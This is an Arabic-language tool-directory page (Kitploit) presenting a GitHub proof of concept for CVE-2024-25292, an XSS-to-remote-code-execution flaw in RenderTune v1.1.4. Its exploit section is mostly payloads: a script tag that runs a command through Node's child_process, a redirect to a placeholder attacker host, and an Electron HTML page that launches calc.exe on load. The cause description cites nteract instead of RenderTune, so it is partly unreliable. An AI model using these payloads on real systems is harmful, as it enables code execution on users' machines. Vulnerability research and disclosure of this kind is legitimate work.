Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-25292 — استغلال XSS إلى RCE في RenderTune v1.1.4 | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2024-25292
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubeqstlab/cve-2024-25292

CVE-2024-25292

استغلال XSS إلى RCE في RenderTune v1.1.4

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RenderTune RCE

إثبات المفهوم لثغرة CVE-2024-25292.

تتيح ثغرة البرمجة النصية عبر المواقع (XSS) في RenderTune v1.1.4 للمهاجمين تنفيذ نصوص ويب أو HTML عشوائية عبر حمولة مصمّمة تُحقن في معامل عنوان الرفع (Upload Title). يحتوي هذا المستودع على تطبيق مثال معرّض للثغرة واستغلال إثبات المفهوم (POC) لها.

كإثبات مفهوم، يوجد ملف بايثون يقوم بأتمتة العملية.

1. نظرة عامة على الثغرة:

إنها ثغرة تتيح تنفيذ الأوامر عن بُعد (RCE) عبر XSS. يوجد جزء من العنوان قابل للـ XSS، لذا فهي ثغرة تتيح تنفيذ الأوامر عن بُعد (RCE) عبر صيغة NodeJS من خلال صيغة XSS.


2. سبب الثغرة:

  • nteract 0.28.0 يسمح بـ Electron webview عبر رابط Markdown، مما يؤدي إلى تنفيذ الأوامر عن بُعد (لأن nodeIntegration في webPreferences مضبوط على true).
  • شرح الاستغلال
    • عند إنشاء روابط عبر MarkDown داخل التطبيق، يتم إنشاء WebView عبر Electron، مما يسمح بالوصول الخارجي إلى الرابط. وبالتالي، يمكن للمهاجم تحقيق تنفيذ الأوامر عن بُعد (RCE) من خلال الاتصال بالرابط المؤدي إلى خادم المهاجم.

إثبات المفهوم (POC)

الحالة 1) من XSS إلى RCE.

الخطوة 1) تأكيد حدوث XSS في جزء العنوان ※ في هذا الوقت، لن يتم تسجيل عنصر الرفع ما لم يتم إرفاق الصورة

root@kitploit:~
<b>jruru</b>

1

الخطوة 2) لذلك، تم تكوينه لاستخدام XSS لتنفيذ أوامر نظام NodeJS.

root@kitploit:~
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>

2

الحالة 2) هجمات عبر خادم المهاجم

※ عندما تحاول الهجوم باستخدام window.location، تنتقل تلقائيًا إلى الصفحة التي عيّنتها في كل مرة تشغّل فيها التطبيق.

root@kitploit:~
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>

ملاحظة: ※ إذا أردت اختباره بسرعة، أنشئ خادمًا على جهاز المهاجم باستخدام الكود التالي.

root@kitploit:~
$ python -m http.server 80
  • كود إثبات المفهوم
root@kitploit:~
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>

renderTune3


تنزيل الأداة